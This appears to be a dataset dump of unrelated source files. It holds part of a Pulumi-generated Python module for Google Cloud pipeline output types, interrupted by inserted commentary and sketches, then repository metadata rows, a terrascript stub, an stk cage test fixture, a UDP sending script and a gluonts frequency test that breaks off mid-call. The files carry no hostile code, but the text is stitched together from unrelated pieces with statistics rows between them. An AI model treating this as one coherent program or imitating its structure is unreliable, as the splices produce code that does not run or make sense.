return pulumi.get(self, "type")
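The `__key_warning`/`__getitem__` pair above lets dictionary-style access with a camelCase key keep working while warning that the snake_case property is preferred. The pattern in isolation (hypothetical sketch, independent of Pulumi):

```python
class CamelCaseWarningDict(dict):
    """Dict that keeps camelCase keys working while recording a
    warning that the snake_case property should be used instead,
    like the __key_warning pattern in the output types above."""
    _suggest = {'mountPoint': 'mount_point', 'readOnly': 'read_only'}
    warnings = []  # collected here instead of pulumi.log.warn

    def __getitem__(self, key):
        if key in self._suggest:
            self.warnings.append(
                "Key '%s' deprecated; access the value via the "
                "'%s' property instead." % (key, self._suggest[key]))
        return super().__getitem__(key)

d = CamelCaseWarningDict({'mountPoint': '/mnt/disk'})
value = d['mountPoint']  # still resolves, but a warning is recorded
```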
@pulumi.output_type
class DockerExecutorResponse(dict):
"""
The Docker executor specification.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "imageName":
suggest = "image_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DockerExecutorResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DockerExecutorResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DockerExecutorResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
cmd: str,
image_name: str):
"""
The Docker executor specification.
:param str cmd: The command or newline delimited script to run. The command string will be executed within a bash shell. If the command exits with a non-zero exit code, output parameter de-localization will be skipped and the pipeline operation's `error` field will be populated. Maximum command string length is 16384.
:param str image_name: Image name from either Docker Hub or Google Container Registry. Users that run pipelines must have READ access to the image.
"""
pulumi.set(__self__, "cmd", cmd)
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def cmd(self) -> str:
"""
The command or newline delimited script to run. The command string will be executed within a bash shell. If the command exits with a non-zero exit code, output parameter de-localization will be skipped and the pipeline operation's `error` field will be populated. Maximum command string length is 16384.
"""
return pulumi.get(self, "cmd")
@property
@pulumi.getter(name="imageName")
def image_name(self) -> str:
"""
Image name from either Docker Hub or Google Container Registry. Users that run pipelines must have READ access to the image.
"""
return pulumi.get(self, "image_name")
@pulumi.output_type
class LocalCopyResponse(dict):
"""
LocalCopy defines how a remote file should be copied to and from the VM.
"""
def __init__(__self__, *,
disk: str,
path: str):
"""
LocalCopy defines how a remote file should be copied to and from the VM.
:param str disk: The name of the disk where this parameter is located. Can be the name of one of the disks specified in the Resources field, or "boot", which represents the Docker instance's boot disk and has a mount point of `/`.
:param str path: The path within the user's docker container where this input should be localized to and from, relative to the specified disk's mount point. For example: file.txt,
"""
pulumi.set(__self__, "disk", disk)
pulumi.set(__self__, "path", path)
@property
@pulumi.getter
def disk(self) -> str:
"""
The name of the disk where this parameter is located. Can be the name of one of the disks specified in the Resources field, or "boot", which represents the Docker instance's boot disk and has a mount point of `/`.
"""
return pulumi.get(self, "disk")
@property
@pulumi.getter
def path(self) -> str:
"""
The path within the user's docker container where this input should be localized to and from, relative to the specified disk's mount point. For example: file.txt,
"""
return pulumi.get(self, "path")
@pulumi.output_type
class PipelineParameterResponse(dict):
"""
Parameters facilitate setting and delivering data into the pipeline's execution environment. They are defined at create time, with optional defaults, and can be overridden at run time. If `localCopy` is unset, then the parameter specifies a string that is passed as-is into the pipeline, as the value of the environment variable with the given name. A default value can be optionally specified at create time. The default can be overridden at run time using the inputs map. If no default is given, a value must be supplied at runtime. If `localCopy` is defined, then the parameter specifies a data source or sink, both in Google Cloud Storage and on the Docker container where the pipeline computation is run. The service account associated with the Pipeline (by default the project's Compute Engine service account) must have access to the Google Cloud Storage paths. At run time, the Google Cloud Storage paths can be overridden if a default was provided at create time, or must be set otherwise. The pipeline runner should add a key/value pair to either the inputs or outputs map. The indicated data copies will be carried out before/after pipeline execution, just as if the corresponding arguments were provided to `gsutil cp`. For example: Given the following `PipelineParameter`, specified in the `inputParameters` list: ``` {name: "input_file", localCopy: {path: "file.txt", disk: "pd1"}} ``` where `disk` is defined in the `PipelineResources` object as: ``` {name: "pd1", mountPoint: "/mnt/disk/"} ``` We create a disk named `pd1`, mount it on the host VM, and map `/mnt/pd1` to `/mnt/disk` in the docker container. At runtime, an entry for `input_file` would be required in the inputs map, such as: ``` inputs["input_file"] = "gs://my-bucket/bar.txt" ``` This would generate the following gsutil call: ``` gsutil cp gs://my-bucket/bar.txt /mnt/pd1/file.txt ``` The file `/mnt/pd1/file.txt` maps to `/mnt/disk/file.txt` in the Docker container. 
Acceptable paths (Google Cloud Storage path -> local path): file -> file; glob -> directory. For outputs, the direction of the copy is reversed: ``` gsutil cp /mnt/disk/file.txt gs://my-bucket/bar.txt ``` Acceptable paths (local path -> Google Cloud Storage path): file -> file; file -> directory (the directory must already exist); glob -> directory (the directory will be created if it doesn't exist). One restriction, due to docker limitations, is that for outputs found on the boot disk the local path cannot be a glob and must be a file.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "defaultValue":
suggest = "default_value"
elif key == "localCopy":
suggest = "local_copy"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PipelineParameterResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PipelineParameterResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PipelineParameterResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
default_value: str,
description: str,
local_copy: 'outputs.LocalCopyResponse',
name: str):
"""
Parameters facilitate setting and delivering data into the pipeline's execution environment. They are defined at create time, with optional defaults, and can be overridden at run time. If `localCopy` is unset, then the parameter specifies a string that is passed as-is into the pipeline, as the value of the environment variable with the given name. A default value can be optionally specified at create time. The default can be overridden at run time using the inputs map. If no default is given, a value must be supplied at runtime. If `localCopy` is defined, then the parameter specifies a data source or sink, both in Google Cloud Storage and on the Docker container where the pipeline computation is run. The service account associated with the Pipeline (by default the project's Compute Engine service account) must have access to the Google Cloud Storage paths. At run time, the Google Cloud Storage paths can be overridden if a default was provided at create time, or must be set otherwise. The pipeline runner should add a key/value pair to either the inputs or outputs map. The indicated data copies will be carried out before/after pipeline execution, just as if the corresponding arguments were provided to `gsutil cp`. For example: Given the following `PipelineParameter`, specified in the `inputParameters` list: ``` {name: "input_file", localCopy: {path: "file.txt", disk: "pd1"}} ``` where `disk` is defined in the `PipelineResources` object as: ``` {name: "pd1", mountPoint: "/mnt/disk/"} ``` We create a disk named `pd1`, mount it on the host VM, and map `/mnt/pd1` to `/mnt/disk` in the docker container. At runtime, an entry for `input_file` would be required in the inputs map, such as: ``` inputs["input_file"] = "gs://my-bucket/bar.txt" ``` This would generate the following gsutil call: ``` gsutil cp gs://my-bucket/bar.txt /mnt/pd1/file.txt ``` The file `/mnt/pd1/file.txt` maps to `/mnt/disk/file.txt` in the Docker container. 
Acceptable paths (Google Cloud Storage path -> local path): file -> file; glob -> directory. For outputs, the direction of the copy is reversed: ``` gsutil cp /mnt/disk/file.txt gs://my-bucket/bar.txt ``` Acceptable paths (local path -> Google Cloud Storage path): file -> file; file -> directory (the directory must already exist); glob -> directory (the directory will be created if it doesn't exist). One restriction, due to docker limitations, is that for outputs found on the boot disk the local path cannot be a glob and must be a file.
:param str default_value: The default value for this parameter. Can be overridden at runtime. If `localCopy` is present, then this must be a Google Cloud Storage path beginning with `gs://`.
:param str description: Human-readable description.
:param 'LocalCopyResponse' local_copy: If present, this parameter is marked for copying to and from the VM. `LocalCopy` indicates where on the VM the file should be. The value given to this parameter (either at runtime or using `defaultValue`) must be the remote path where the file should be.
:param str name: Name of the parameter - the pipeline runner uses this string as the key to the input and output maps in RunPipeline.
"""
pulumi.set(__self__, "default_value", default_value)
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "local_copy", local_copy)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="defaultValue")
def default_value(self) -> str:
"""
The default value for this parameter. Can be overridden at runtime. If `localCopy` is present, then this must be a Google Cloud Storage path beginning with `gs://`.
"""
return pulumi.get(self, "default_value")
@property
@pulumi.getter
def description(self) -> str:
"""
Human-readable description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="localCopy")
def local_copy(self) -> 'outputs.LocalCopyResponse':
"""
If present, this parameter is marked for copying to and from the VM. `LocalCopy` indicates where on the VM the file should be. The value given to this parameter (either at runtime or using `defaultValue`) must be the remote path where the file should be.
"""
return pulumi.get(self, "local_copy")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the parameter - the pipeline runner uses this string as the key to the input and output maps in RunPipeline.
"""
return pulumi.get(self, "name")
@pulumi.output_type
class PipelineResourcesResponse(dict):
"""
The system resources for the pipeline run.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "acceleratorCount":
suggest = "accelerator_count"
elif key == "acceleratorType":
suggest = "accelerator_type"
elif key == "bootDiskSizeGb":
suggest = "boot_disk_size_gb"
elif key == "minimumCpuCores":
suggest = "minimum_cpu_cores"
elif key == "minimumRamGb":
suggest = "minimum_ram_gb"
elif key == "noAddress":
suggest = "no_address"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PipelineResourcesResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PipelineResourcesResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PipelineResourcesResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
accelerator_count: str,
accelerator_type: str,
boot_disk_size_gb: int,
disks: Sequence['outputs.DiskResponse'],
minimum_cpu_cores: int,
minimum_ram_gb: float,
no_address: bool,
preemptible: bool,
zones: Sequence[str]):
"""
The system resources for the pipeline run.
:param str accelerator_count: Optional. The number of accelerators of the specified type to attach. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit.
:param str accelerator_type: Optional. The Compute Engine defined accelerator type. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit. Please see https://cloud.google.com/compute/docs/gpus/ for a list of available accelerator types.
:param int boot_disk_size_gb: The size of the boot disk. Defaults to 10 (GB).
:param Sequence['DiskResponse'] disks: Disks to attach.
:param int minimum_cpu_cores: The minimum number of cores to use. Defaults to 1.
:param float minimum_ram_gb: The minimum amount of RAM to use. Defaults to 3.75 (GB)
:param bool no_address: Whether to assign an external IP to the instance. This is an experimental feature that may go away. Defaults to false. Corresponds to `--no_address` flag for [gcloud compute instances create] (https://cloud.google.com/sdk/gcloud/reference/compute/instances/create). In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time. If you need to ssh into a private IP VM for debugging, you can ssh to a public VM and then ssh into the private VM's Internal IP. If noAddress is set, this pipeline run may only load docker images from Google Container Registry and not Docker Hub. Before using this, you must [configure access to Google services from internal IPs](https://cloud.google.com/compute/docs/configure-private-google-access#configuring_access_to_google_services_from_internal_ips).
:param bool preemptible: Whether to use preemptible VMs. Defaults to `false`. In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time.
:param Sequence[str] zones: List of Google Compute Engine availability zones to which resource creation will be restricted. If empty, any zone may be chosen.
"""
pulumi.set(__self__, "accelerator_count", accelerator_count)
pulumi.set(__self__, "accelerator_type", accelerator_type)
pulumi.set(__self__, "boot_disk_size_gb", boot_disk_size_gb)
pulumi.set(__self__, "disks", disks)
pulumi.set(__self__, "minimum_cpu_cores", minimum_cpu_cores)
pulumi.set(__self__, "minimum_ram_gb", minimum_ram_gb)
pulumi.set(__self__, "no_address", no_address)
pulumi.set(__self__, "preemptible", preemptible)
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="acceleratorCount")
def accelerator_count(self) -> str:
"""
Optional. The number of accelerators of the specified type to attach. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit.
"""
return pulumi.get(self, "accelerator_count")
@property
@pulumi.getter(name="acceleratorType")
def accelerator_type(self) -> str:
"""
Optional. The Compute Engine defined accelerator type. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit. Please see https://cloud.google.com/compute/docs/gpus/ for a list of available accelerator types.
"""
return pulumi.get(self, "accelerator_type")
@property
@pulumi.getter(name="bootDiskSizeGb")
def boot_disk_size_gb(self) -> int:
"""
The size of the boot disk. Defaults to 10 (GB).
"""
return pulumi.get(self, "boot_disk_size_gb")
@property
@pulumi.getter
def disks(self) -> Sequence['outputs.DiskResponse']:
"""
Disks to attach.
"""
return pulumi.get(self, "disks")
@property
@pulumi.getter(name="minimumCpuCores")
def minimum_cpu_cores(self) -> int:
"""
The minimum number of cores to use. Defaults to 1.
"""
return pulumi.get(self, "minimum_cpu_cores")
@property
@pulumi.getter(name="minimumRamGb")
def minimum_ram_gb(self) -> float:
"""
The minimum amount of RAM to use. Defaults to 3.75 (GB).
"""
return pulumi.get(self, "minimum_ram_gb")
@property
@pulumi.getter(name="noAddress")
def no_address(self) -> bool:
"""
Whether to assign an external IP to the instance. This is an experimental feature that may go away. Defaults to false. Corresponds to `--no_address` flag for [gcloud compute instances create] (https://cloud.google.com/sdk/gcloud/reference/compute/instances/create). In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time. If you need to ssh into a private IP VM for debugging, you can ssh to a public VM and then ssh into the private VM's Internal IP. If noAddress is set, this pipeline run may only load docker images from Google Container Registry and not Docker Hub. Before using this, you must [configure access to Google services from internal IPs](https://cloud.google.com/compute/docs/configure-private-google-access#configuring_access_to_google_services_from_internal_ips).
"""
return pulumi.get(self, "no_address")
@property
@pulumi.getter
def preemptible(self) -> bool:
"""
Whether to use preemptible VMs. Defaults to `false`. In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time.
"""
return pulumi.get(self, "preemptible")
@property
@pulumi.getter
def zones(self) -> Sequence[str]:
"""
List of Google Compute Engine availability zones to which resource creation will be restricted. If empty, any zone may be chosen.
"""
return pulumi.get(self, "zones")
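The getters above all delegate to `pulumi.set`/`pulumi.get`. A minimal stand-in for that round trip, purely for illustration (`_FakeResources`, `fake_set` and `fake_get` are hypothetical names, not the real pulumi SDK, which does more than dict-backed storage):

```python
# Illustrative sketch of the pulumi.set / pulumi.get round trip: values are
# simply kept in the instance __dict__ under the given key.
class _FakeResources:
    pass

def fake_set(obj, key, value):
    obj.__dict__[key] = value

def fake_get(obj, key):
    return obj.__dict__[key]

res = _FakeResources()
fake_set(res, "minimum_cpu_cores", 1)      # documented default above
fake_set(res, "minimum_ram_gb", 3.75)      # documented default above
print(fake_get(res, "minimum_cpu_cores"))  # 1
print(fake_get(res, "minimum_ram_gb"))     # 3.75
```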
| 59.331719 | 2,480 | 0.687398 | 3,422 | 24,504 | 4.823787 | 0.113676 | 0.01145 | 0.018114 | 0.026474 | 0.773308 | 0.747077 | 0.740534 | 0.711698 | 0.710123 | 0.710123 | 0 | 0.00248 | 0.226657 | 24,504 | 412 | 2,481 | 59.475728 | 0.867968 | 0.598719 | 0 | 0.382979 | 1 | 0.017021 | 0.16493 | 0.022073 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170213 | false | 0 | 0.029787 | 0 | 0.353191 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6dc6c1887b92ab53df1e1d382428aadcc9f47984 | 376 | py | Python | terrascript/resource/fastly.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/resource/fastly.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/resource/fastly.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/resource/fastly.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:16:17 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.fastly
#
# instead of
#
# >>> import terrascript.resource.fastly.fastly
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.fastly.fastly import *
| 25.066667 | 73 | 0.742021 | 49 | 376 | 5.693878 | 0.693878 | 0.272401 | 0.358423 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036923 | 0.135638 | 376 | 14 | 74 | 26.857143 | 0.821538 | 0.800532 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
6df5deb42adc4d7afd977cc0be95c11b8fd4486e | 2,918 | py | Python | tests/molecular/molecules/molecule/fixtures/cage/metal_topologies/m6l2l3_prism.py | andrewtarzia/stk | 1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a | [
"MIT"
] | 21 | 2018-04-12T16:25:24.000Z | 2022-02-14T23:05:43.000Z | tests/molecular/molecules/molecule/fixtures/cage/metal_topologies/m6l2l3_prism.py | JelfsMaterialsGroup/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 8 | 2019-03-19T12:36:36.000Z | 2020-11-11T12:46:00.000Z | tests/molecular/molecules/molecule/fixtures/cage/metal_topologies/m6l2l3_prism.py | supramolecular-toolkit/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 5 | 2018-08-07T13:00:16.000Z | 2021-11-01T00:55:10.000Z | import pytest
import stk
from ...building_blocks import (
get_tetratopic_linker,
get_tritopic_linker,
get_iron_complex,
)
from ....case_data import CaseData
@pytest.fixture(
scope='session',
params=(
lambda name: CaseData(
molecule=stk.ConstructedMolecule(
topology_graph=stk.cage.M6L2L3Prism(
building_blocks={
get_iron_complex(): range(6),
get_tritopic_linker(): range(6, 8),
get_tetratopic_linker(): range(8, 11),
},
),
),
smiles=(
'[H]C1=C([H])C([H])=N2->[Fe+2]3456<-N7=C([H])C([H])=C('
'[H])C([H])=C7C([H])=N->3C3=C([H])C([H])=C(C([H])=C3[H'
'])C3([H])C7=C([H])C([H])=C(C([H])=C7[H])N7->[Fe+2]89%'
'10(<-N%11=C([H])C([H])=C([H])C([H])=C%11C([H])=N->8C8'
'=C([H])C([H])=C(C([H])=C8[H])N(C8=C([H])C([H])=C(C([H'
'])=C8[H])N->4=C([H])C2=C1[H])C1=C([H])C([H])=C(C([H])'
'=C1[H])N1->[Fe+2]248(<-N%11=C([H])C([H])=C([H])C([H])'
'=C%11C=1[H])<-N1=C([H])C([H])=C([H])C([H])=C1C([H])=N'
'->2C1=C([H])C([H])=C(C([H])=C1[H])C([H])(C1=C([H])C(['
'H])=C(C([H])=C1[H])N->5=C([H])C1=C([H])C([H])=C([H])C'
'([H])=N->61)C1([H])C2=C([H])C([H])=C(C([H])=C2[H])N2-'
'>[Fe+2]56%11(<-N%12=C([H])C([H])=C([H])C([H])=C%12C(['
'H])=N->5C5=C([H])C([H])=C(C([H])=C5[H])N5C%12=C([H])C'
'([H])=C(C([H])=C%12[H])N%12->[Fe+2]%13%14(<-N%15=C([H'
'])C([H])=C([H])C([H])=C%15C=%12[H])(<-N%12=C([H])C([H'
'])=C([H])C([H])=C%12C([H])=N->%13C%12=C([H])C([H])=C('
'C([H])=C%12[H])C3([H])C3=C([H])C([H])=C(C([H])=C3[H])'
'N3->[Fe+2]%12%13(<-N%15=C([H])C([H])=C([H])C([H])=C%1'
'5C([H])=N->%12C%12=C([H])C([H])=C5C([H])=C%12[H])(<-N'
'5=C([H])C([H])=C([H])C([H])=C5C=3[H])<-N3=C([H])C([H]'
')=C([H])C([H])=C3C([H])=N->%13C3=C([H])C([H])=C(C([H]'
')=C3[H])C([H])(C3=C([H])C([H])=C(C([H])=C3[H])N->9=C('
'[H])C3=C([H])C([H])=C([H])C([H])=N->%103)C([H])(C3=C('
'[H])C([H])=C(C([H])=C3[H])N->4=C([H])C3=C([H])C([H])='
'C([H])C([H])=N->83)C3=C([H])C([H])=C(C([H])=C3[H])N->'
'6=C([H])C3=C([H])C([H])=C([H])C([H])=N->%113)<-N3=C(['
'H])C([H])=C([H])C([H])=C3C([H])=N->%14C3=C([H])C([H])'
'=C1C([H])=C3[H])<-N1=C([H])C([H])=C([H])C([H])=C1C=2['
'H])<-N1=C([H])C([H])=C([H])C([H])=C1C=7[H]'
),
name=name,
),
),
)
def metal_cage_m6l2l3_prism(request) -> CaseData:
return request.param(
f'{request.fixturename}{request.param_index}',
)
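The fixture above stores a callable as its param and builds the case name from `request.fixturename` and `request.param_index`. A pytest-free sketch of that factory pattern (here `make_case`, and the faked name/index, are assumptions used only to show the mechanics):

```python
# Each param is a callable that builds its case from a generated name;
# pytest supplies fixturename/param_index, which we fake here.
def make_case(name):
    return {"name": name}

params = (make_case,)
fixturename, param_index = "metal_cage_m6l2l3_prism", 0
case = params[param_index](f"{fixturename}{param_index}")
print(case["name"])  # metal_cage_m6l2l3_prism0
```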
| 45.59375 | 71 | 0.357779 | 545 | 2,918 | 1.878899 | 0.168807 | 0.253906 | 0.275391 | 0.273438 | 0.441406 | 0.416016 | 0.400391 | 0.379883 | 0.359375 | 0.321289 | 0 | 0.082386 | 0.276217 | 2,918 | 63 | 72 | 46.31746 | 0.402462 | 0 | 0 | 0.083333 | 0 | 0.483333 | 0.539753 | 0.537354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.066667 | 0.016667 | 0.1 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
097c277949b6bbccbd4cb01538a8595089f99776 | 114 | py | Python | Libraries_and_Files/importing_05.py | ItaySharabi/LearnPython | 6b91e5143fbe5e44bdeeec671726ee6895890730 | [
"MIT"
] | 2 | 2022-02-16T21:41:45.000Z | 2022-03-01T12:39:56.000Z | Libraries_and_Files/importing_05.py | ItaySharabi/LearnPython | 6b91e5143fbe5e44bdeeec671726ee6895890730 | [
"MIT"
] | null | null | null | Libraries_and_Files/importing_05.py | ItaySharabi/LearnPython | 6b91e5143fbe5e44bdeeec671726ee6895890730 | [
"MIT"
] | null | null | null | # import my_lib as lib
#
# print(f'Time: {lib.current_time()}')
# from my_lib import *
# import my_lib as lib
| 11.4 | 38 | 0.657895 | 20 | 114 | 3.55 | 0.45 | 0.211268 | 0.309859 | 0.366197 | 0.450704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201754 | 114 | 9 | 39 | 12.666667 | 0.78022 | 0.868421 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1100c62cac2d325fe5f10a2a90709abea5d02570 | 1,969 | py | Python | Tools/Shell/send_test.py | chenxull/UDP_Project | 2490ee11dea3f0a11ff509f59338e510db25d0d9 | [
"MIT"
] | null | null | null | Tools/Shell/send_test.py | chenxull/UDP_Project | 2490ee11dea3f0a11ff509f59338e510db25d0d9 | [
"MIT"
] | null | null | null | Tools/Shell/send_test.py | chenxull/UDP_Project | 2490ee11dea3f0a11ff509f59338e510db25d0d9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding:utf-8
"""send_udp.py"""
# import argparse
import socket
import time
UDP_IP = "172.16.1.1"
UDP_PORT = 8000
MESSAGE = "012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789"
print("UDP target IP:", UDP_IP)
print("UDP target port:", UDP_PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
start = time.monotonic()
for index in range(1, 999, 1):
text = "%03d" % (index)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
input("Press Enter to continue...")
finish = time.monotonic()
print("Duration ", (finish - start))
| 70.321429 | 1,422 | 0.907059 | 88 | 1,969 | 20.193182 | 0.545455 | 0.008441 | 0.015757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.760638 | 0.045201 | 1,969 | 27 | 1,423 | 72.925926 | 0.184574 | 0.033012 | 0 | 0 | 0 | 0 | 0.788391 | 0.744063 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.1875 | 0.1875 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
11555bb09dc3964db6a2a8fdb54baa6464da7b3f | 9,461 | py | Python | tests/python/unit/test_frequencies.py | dataiku/dss-plugin-timeseries-forecast | 56980fdab629b5eb27ce4c17e7ba2348c2b2cb28 | [
"Apache-2.0"
] | 11 | 2020-12-21T12:49:26.000Z | 2022-03-11T06:29:49.000Z | tests/python/unit/test_frequencies.py | dataiku/dss-plugin-timeseries-forecast | 56980fdab629b5eb27ce4c17e7ba2348c2b2cb28 | [
"Apache-2.0"
] | 30 | 2020-12-01T18:17:58.000Z | 2022-03-29T21:43:51.000Z | tests/python/unit/test_frequencies.py | dataiku/dss-plugin-timeseries-forecast | 56980fdab629b5eb27ce4c17e7ba2348c2b2cb28 | [
"Apache-2.0"
] | 5 | 2021-02-13T12:18:15.000Z | 2021-09-28T15:55:03.000Z | from gluonts.dataset.common import ListDataset
from gluonts_forecasts.model import Model
from gluonts_forecasts.trained_model import TrainedModel
from dku_constants import TIMESERIES_KEYS
import pandas as pd
import numpy as np
def test_minute_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-15 12:40:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "20min"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-15 13:00:00")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
frequency=frequency,
prediction_length=prediction_length,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-15 13:20:00")
def test_hours_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-15 12:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "6H"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-15 18:00:00")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
